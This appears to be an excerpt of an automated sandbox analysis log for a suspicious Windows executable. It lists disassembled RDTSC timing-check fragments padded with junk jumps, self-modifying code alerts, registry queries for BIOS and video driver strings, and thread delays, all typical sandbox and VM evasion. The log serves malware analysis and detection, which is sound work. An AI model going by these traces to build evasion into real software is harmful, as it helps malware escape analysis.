Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D08 second address: 4D60D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9899183FF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D20 second address: 4D60D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D60 second address: 4D60D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D64 second address: 4D60D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D6A second address: 4D60DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F9899183FEDh 0x00000012 pop esi 0x00000013 popad 0x00000014 test edi, edi 0x00000016 jmp 00007F9899183FEAh 0x0000001b js 00007F9909222904h 0x00000021 jmp 00007F9899183FF0h 0x00000026 mov eax, dword ptr [ebp-04h] 0x00000029 jmp 00007F9899183FF0h 0x0000002e mov dword ptr [esi+08h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edi, 75195430h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60DD1 second address: 4D60DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60DD6 second address: 4D60EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F9899183FF0h 0x00000011 push 00000001h 0x00000013 jmp 00007F9899183FF0h 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F9899183FEEh 0x00000020 or cx, AE08h 0x00000025 jmp 00007F9899183FEBh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F9899183FF8h 0x00000031 or eax, 2626D068h 0x00000037 jmp 00007F9899183FEBh 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F9899183FEFh 0x00000046 and si, 53AEh 0x0000004b jmp 00007F9899183FF9h 0x00000050 popfd 0x00000051 jmp 00007F9899183FF0h 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60EAA second address: 4D60EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60EC7 second address: 4D60F3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007F9899183FEEh 0x00000011 nop 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F9899183FEEh 0x00000019 adc cx, ED18h 0x0000001e jmp 00007F9899183FEBh 0x00000023 popfd 0x00000024 mov dx, cx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F9899183FEEh 0x00000032 xor cx, D778h 0x00000037 jmp 00007F9899183FEBh 0x0000003c popfd 0x0000003d mov si, CEAFh 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60F3C second address: 4D60F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60F95 second address: 4D60FCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edi, eax 0x0000000e jmp 00007F9899183FF3h 0x00000013 test edi, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9899183FF0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60FCC second address: 4D60FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60FD0 second address: 4D60FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60FD6 second address: 4D61025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 33h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F9909240E27h 0x0000000e jmp 00007F98991A2762h 0x00000013 mov eax, dword ptr [ebp-14h] 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a popad 0x0000001b mov ecx, esi 0x0000001d pushad 0x0000001e mov ecx, ebx 0x00000020 mov ax, bx 0x00000023 popad 0x00000024 mov dword ptr [esi+0Ch], eax 0x00000027 jmp 00007F98991A2763h 0x0000002c mov edx, 74E806ECh 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61025 second address: 4D610E0 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, 00000000h 0x0000000c jmp 00007F9899183FF4h 0x00000011 lock cmpxchg dword ptr [edx], ecx 0x00000015 pushad 0x00000016 mov edx, esi 0x00000018 mov di, si 0x0000001b popad 0x0000001c pop edi 0x0000001d jmp 00007F9899183FF4h 0x00000022 test eax, eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F9899183FEEh 0x0000002b or ch, 00000008h 0x0000002e jmp 00007F9899183FEBh 0x00000033 popfd 0x00000034 popad 0x00000035 jne 00007F990922263Bh 0x0000003b jmp 00007F9899183FF5h 0x00000040 mov edx, dword ptr [ebp+08h] 0x00000043 jmp 00007F9899183FEEh 0x00000048 mov eax, dword ptr [esi] 0x0000004a jmp 00007F9899183FF0h 0x0000004f mov dword ptr [edx], eax 0x00000051 jmp 00007F9899183FF0h 0x00000056 mov eax, dword ptr [esi+04h] 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D610E0 second address: 4D610E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D610E6 second address: 4D61107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, E041h 0x00000007 mov esi, 69F23F7Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+04h], eax 0x00000012 pushad 0x00000013 mov cl, E1h 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 mov eax, dword ptr [esi+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61107 second address: 4D61132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F98991A2764h 0x0000000a add si, D8B8h 0x0000000f jmp 00007F98991A275Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61132 second address: 4D611D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007F9899183FEEh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F9899183FEEh 0x0000001b jmp 00007F9899183FF5h 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [edx+0Ch], eax 0x00000025 jmp 00007F9899183FEDh 0x0000002a mov eax, dword ptr [esi+10h] 0x0000002d jmp 00007F9899183FEEh 0x00000032 mov dword ptr [edx+10h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov di, 4F20h 0x0000003c call 00007F9899183FF9h 0x00000041 pop eax 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D611D0 second address: 4D612D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c jmp 00007F98991A2760h 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F98991A275Eh 0x0000001b jmp 00007F98991A2765h 0x00000020 popfd 0x00000021 call 00007F98991A2760h 0x00000026 pushfd 0x00000027 jmp 00007F98991A2762h 0x0000002c adc si, 5088h 0x00000031 jmp 00007F98991A275Bh 0x00000036 popfd 0x00000037 pop eax 0x00000038 popad 0x00000039 mov eax, dword ptr [esi+18h] 0x0000003c pushad 0x0000003d movsx ebx, ax 0x00000040 pushfd 0x00000041 jmp 00007F98991A275Eh 0x00000046 xor ecx, 4405B2E8h 0x0000004c jmp 00007F98991A275Bh 0x00000051 popfd 0x00000052 popad 0x00000053 mov dword ptr [edx+18h], eax 0x00000056 jmp 00007F98991A2766h 0x0000005b mov eax, dword ptr [esi+1Ch] 0x0000005e jmp 00007F98991A2760h 0x00000063 mov dword ptr [edx+1Ch], eax 0x00000066 pushad 0x00000067 pushfd 0x00000068 jmp 00007F98991A275Eh 0x0000006d xor ch, FFFFFFA8h 0x00000070 jmp 00007F98991A275Bh 0x00000075 popfd 0x00000076 push eax 0x00000077 push edx 0x00000078 mov esi, 6FA59BB5h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D612D2 second address: 4D6130C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+20h] 0x0000000d pushad 0x0000000e jmp 00007F9899183FEEh 0x00000013 pushad 0x00000014 movzx ecx, dx 0x00000017 mov eax, edi 0x00000019 popad 0x0000001a popad 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6130C second address: 4D61310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61310 second address: 4D61316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61316 second address: 4D6139D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007F98991A2766h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 pushad 0x00000015 mov bh, ah 0x00000017 call 00007F98991A2763h 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+28h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F98991A275Bh 0x0000002a adc esi, 5EC90A6Eh 0x00000030 jmp 00007F98991A2769h 0x00000035 popfd 0x00000036 popad 0x00000037 mov dword ptr [edx+28h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6139D second address: 4D613A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613A1 second address: 4D613A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613A7 second address: 4D613CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9899183FEAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613CA second address: 4D613D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613D9 second address: 4D61422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b pushad 0x0000000c mov ax, 8289h 0x00000010 pushfd 0x00000011 jmp 00007F9899183FF6h 0x00000016 sbb eax, 7826BDD8h 0x0000001c jmp 00007F9899183FEBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ax, word ptr [esi+30h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov dx, 7EC6h 0x0000002e movsx edx, cx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61422 second address: 4D61428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61428 second address: 4D61458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F9899183FF7h 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b push edx 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61458 second address: 4D6145E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6145E second address: 4D614E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f pushad 0x00000010 mov edi, 5F222310h 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007F9899183FEFh 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F9899183FEBh 0x0000002a jmp 00007F9899183FF3h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F9899183FF8h 0x00000036 sub cl, FFFFFFE8h 0x00000039 jmp 00007F9899183FEBh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D614E2 second address: 4D614FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2764h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D614FA second address: 4D6152F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f mov bl, 5Bh 0x00000011 mov si, 5CD5h 0x00000015 popad 0x00000016 jne 00007F99092221EDh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9899183FF7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6152F second address: 4D6155E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f jmp 00007F98991A275Dh 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F98991A275Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6155E second address: 4D615B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d jmp 00007F9899183FEEh 0x00000012 pop esi 0x00000013 jmp 00007F9899183FF0h 0x00000018 pop ebx 0x00000019 jmp 00007F9899183FF0h 0x0000001e leave 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 mov di, 033Ch 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D615B3 second address: 4DB0301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d push FFFFFFFEh 0x0000000f pop edi 0x00000010 mov dword ptr [ebp-04h], edi 0x00000013 mov eax, 00005A4Dh 0x00000018 cmp word ptr [00400000h], ax 0x0000001f jne 00007F98991A278Ah 0x00000021 mov eax, dword ptr [0040003Ch] 0x00000026 cmp dword ptr [eax+00400000h], 00004550h 0x00000030 jne 00007F98991A2779h 0x00000032 mov ecx, 0000010Bh 0x00000037 cmp word ptr [eax+00400018h], cx 0x0000003e jne 00007F98991A276Bh 0x00000040 cmp dword ptr [eax+00400074h], 0Eh 0x00000047 jbe 00007F98991A2762h 0x00000049 xor ecx, ecx 0x0000004b cmp dword ptr [eax+004000E8h], esi 0x00000051 setne cl 0x00000054 mov dword ptr [ebp-1Ch], ecx 0x00000057 jmp 00007F98991A2755h 0x00000059 xor ebx, ebx 0x0000005b inc ebx 0x0000005c push ebx 0x0000005d call 00007F98991A4845h 0x00000062 mov edi, edi 0x00000064 push ebp 0x00000065 mov ebp, esp 0x00000067 xor eax, eax 0x00000069 cmp dword ptr [ebp+08h], eax 0x0000006c push 00000000h 0x0000006e sete al 0x00000071 push 00001000h 0x00000076 push eax 0x00000077 call 00007F989DB4F53Bh 0x0000007c mov edi, edi 0x0000007e push eax 0x0000007f push edx 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0301 second address: 4DB0307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0307 second address: 4DB030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB030C second address: 4DB0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0312 second address: 4DB0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0316 second address: 4DB0346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9899183FF7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0346 second address: 4DB035E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2764h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB035E second address: 4DB0362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0362 second address: 4DB0371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0371 second address: 4DB0375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0375 second address: 4DB0388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C69 second address: 4D40C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C6E second address: 4D40C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C74 second address: 4D40C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C78 second address: 4D40C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C7C second address: 4D40CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b mov eax, ebx 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007F9899183FF3h 0x00000014 xor esi, 3FE6F8AEh 0x0000001a jmp 00007F9899183FF9h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F9899183FEEh 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D615DD second address: 4D615F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2760h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D615F1 second address: 4D61670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F9899183FF6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F9899183FF1h 0x00000019 add ecx, 2F3D7206h 0x0000001f jmp 00007F9899183FF1h 0x00000024 popfd 0x00000025 jmp 00007F9899183FF0h 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9899183FF7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61670 second address: 4D61682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61682 second address: 4D61688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61729 second address: 4D615DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0008h 0x0000000c push 0042F258h 0x00000011 push edi 0x00000012 mov dword ptr [00434D64h], eax 0x00000017 call esi 0x00000019 mov edi, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edx, 5A8F5C70h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA04C7 second address: 4DA04CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Special instruction interceptor: First address: 81C96A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Special instruction interceptor: First address: 81CA36 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Special instruction interceptor: First address: 81C98F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Special instruction interceptor: First address: 9BCBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_0081C9F3 rdtsc 0_2_0081C9F3
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Window / User API: threadDelayed 905
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Window / User API: threadDelayed 962
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Window / User API: threadDelayed 951
